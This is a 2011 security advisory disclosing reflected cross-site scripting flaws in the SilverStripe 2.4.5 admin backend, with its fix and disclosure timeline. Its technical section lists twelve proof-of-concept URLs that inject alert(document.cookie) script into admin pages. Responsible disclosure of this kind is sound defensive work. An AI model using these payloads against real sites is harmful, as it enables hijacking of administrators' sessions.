SSCHADV2011-024 - SilverStripe 2.4.5 Multiple backend Cross-site scripting vulnerabilities
Advisory:
|
SilverStripe 2.4.5 Multiple backend Cross-site scripting vulnerabilities
|
Advisory ID:
|
SSCHADV2011-024
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on SilverStripe 2.4.5
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
CVE-ID:
|
-
|
======================
Vulnerability Description:
======================
SilverStripe 2.4.5 backend is prone to multiple Cross-site scripting vulnerabilities
==============
Technical Details:
==============
Backend – XSS
http://<target>/SilverStripe-v2.4.5/admin/reports/?’"</script><script>alert(document.cookie)</script>
http://<target>/SilverStripe-v2.4.5/admin/comments/?’"</script><script>alert(document.cookie)</script>
http://<target>/SilverStripe-v2.4.5/admin/?’"</script><script>alert(document.cookie)</script>
http://<target>/SilverStripe-v2.4.5/admin/show/4?’"</script><script>alert(document.cookie)</script>
http://<target>/SilverStripe-v2.4.5/admin/show/2?’"</script><script>alert(document.cookie)</script>
http://<target>/SilverStripe-v2.4.5/admin/show/root?’"</script><script>alert(document.cookie)</script>
http://<target>/SilverStripe-v2.4.5/admin/show/3?’"</script><script>alert(document.cookie)</script>
http://<target>/SilverStripe-v2.4.5/admin/show/?’"</script><script>alert(document.cookie)</script>
http://<target>/SilverStripe-v2.4.5/admin/assets/?’"</script><script>alert(document.cookie)</script>
http://<target>/SilverStripe-v2.4.5/admin/show/1?’"</script><script>alert(document.cookie)</script>
http://<target>/SilverStripe-v2.4.5/admin/show/5?’"</script><script>alert(document.cookie)</script>
http://<target>/SilverStripe-v2.4.5/admin/security/?’"</script><script>alert(document.cookie)</script>
|
=====
Solution:
=====
Update to the latest version 2.4.6
================
Disclosure Timeline:
================
05-Oct-2011 – informed developers
06-Oct-2011 – release date of this security advisory
06-Oct-2011 – release date of this security advisory
08-Oct-2011 – post on BugTraq
17-Oct-2011 – fixed by vendor
====
Credits:
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References:
=======
Comments
Display comments as Linear | Threaded